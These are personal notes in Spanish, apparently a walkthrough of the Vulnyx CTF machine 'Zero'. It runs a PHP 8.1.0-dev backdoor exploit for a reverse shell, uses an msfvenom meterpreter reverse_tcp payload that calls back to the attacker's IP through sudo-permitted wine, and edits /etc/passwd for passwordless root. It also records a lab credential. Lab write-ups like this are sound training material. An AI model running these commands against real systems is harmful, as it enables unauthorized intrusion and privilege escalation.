Notas de Luis

Hacemos el reconocimiento con nmap:

Y esto corre dentro del puerto 80:

Y lo mismo por el puerto 8080:

Y si miramos las cabeceras del puerto 8080 vemos algo de php:

Investigamos exploits para esta versión, donde podemos usar el siguiente exploit: https://github.com/flast101/php-8.1.0-dev-backdoor-rce

Vemos las instrucciones y lo lanzamos:

python revshell_php_8.1.0-dev.py http://192.168.0.43:8080/ 192.168.0.32 443

Donde recibiremos la reverse shell:

Pero vemos que no estamos dentro de la máquina víctima, sino a un contenedor o algo similar:

Y si miramos en el history, vemos una contraseña para entrar como el usuario liam:

liam:L14mD0ck3Rp0w4

Y vemos que funciona y ya somos el usuario liam:

Si ejecutamos un sudo -l vemos que podemos ejecutar como sudo la herramienta de wine:

Pero si lo ejecutamos, vemos que pide un fichero .exe para ejecutarlo:

Por lo que podemos crear con msfvenom un fichero malicioso en formato exe:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.32 LPORT=443 -f exe > pwned.exe

Y lo compartimos con la máquina víctima:

Y ponemos el payload para recibir una sesión de meterpreter:

set PAYLOAD windows/x64/meterpreter/reverse_tcp

Lo ejecutamos como sudo en la máquina víctima:

Y recibimos la conexión con mi máquina atacante como root:

Pero esta sesión tiene limitaciones, por lo que si queremos convertirnos en usuario root de forma normal, podemos copiarnos en local el fichero /etc/passwd y eliminar la parte de la x de root, de tal forma que así podremos iniciar sesión como root sin proporcionar su contraseña:

Y quitamos la x de root, lo cual significa que es el campo de contraseña:

Lo volvemos a subir a la máquina víctima reemplazando el passwd original, ubicándonos en el directorio /etc y ahí lo subimos:

Por lo que si ahora iniciamos sesión como liam y ejecutamos el comando su root, no nos pedirá las credenciales gracias a haber reemplzado el fichero passwd:

computing/hacking/ctf/vulnyx/maquina_zero.txt · Última modificación: por 127.0.0.1